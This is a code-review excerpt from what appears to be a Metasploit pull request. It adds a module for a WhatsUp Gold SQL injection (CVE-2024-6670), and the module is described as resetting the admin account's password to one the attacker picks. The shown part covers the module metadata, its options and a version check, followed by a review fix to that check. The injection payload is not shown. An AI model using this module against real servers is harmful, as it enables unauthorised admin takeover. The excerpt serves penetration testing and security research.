modules/auxiliary/admin/http/whatsup_gold_sqli.rb

```diff
@@ -0,0 +1,192 @@
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WhatsUp Gold SQL Injection (CVE-2024-6670)',
+        'Description' => %q{
+          This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)
+          to an attacker-controlled one.
+
+          WhatsUp Gold versions < v24.0.0 are affected.
+        },
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)' # Discovery & PoC
+        ],
+        'References' => [
+          ['CVE', '2024-6670'],
+          ['URL', 'https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024'],
+          ['URL', 'https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-24-1185/']
+        ],
+        'DisclosureDate' => '2024-08-29',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => 'True'
+        },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'Username of which to update the password (default: admin)', 'admin']),
+      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(12)]),
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'NmConsole/app.json')
+    })
+
+    return CheckCode::Unknown unless res && res.code == 200
+
+    data = res.get_json_document
+    data_js = data['js']
+    version_path = data_js.find { |item| item['path'] =~ /app-/ }['path']
+    version = version_path[/app-(.*)\.js/, 1]
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      vprint_status('Version retrieved: ' + version)
+    end
+
+    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('23.1.3')
```

Comment:
```suggestion
    return Exploit::CheckCode::Appears("Version: #{version}") if Rex::Version.new(version) <= Rex::Version.new('23.1.3')
```
The variable `version` needs to be converted to a Rex::Version object to avoid this type of failure: 
```
[-] Auxiliary failed: ArgumentError comparison of String with Rex::Version failed
```

Reply:
Thank you, updated.